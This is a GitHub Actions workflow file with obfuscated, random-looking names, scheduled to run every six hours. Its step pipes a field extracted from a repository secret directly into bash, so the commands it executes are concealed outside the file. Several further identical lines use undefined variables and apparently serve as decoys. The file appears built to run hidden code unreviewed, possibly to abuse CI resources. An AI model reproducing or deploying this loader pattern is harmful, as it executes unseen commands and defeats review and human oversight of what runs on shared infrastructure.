name: yinzhiping2389
on:
  workflow_dispatch:
  schedule:
    - cron: '14 0/6 * * *'
jobs:  # 20039
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yinzhiping2389
        env:
          xpzvp0010: ${{ secrets.xpzvp0010 }}
        run: |
          echo $xpzvp0010 | jq -r .jtnj3861 | /bin/bash
          echo $thuy63 | jq -r .kcwwn0247 | /bin/bash
          echo $ow6 | jq -r .mjl7 | /bin/bash
          echo $otywp58795 | jq -r .qgdy153 | /bin/bash
          echo $vg777 | jq -r .zzc153 | /bin/bash
          echo $iaq6504 | jq -r .gu8362 | /bin/bash
          echo $j22 | jq -r .y858 | /bin/bash

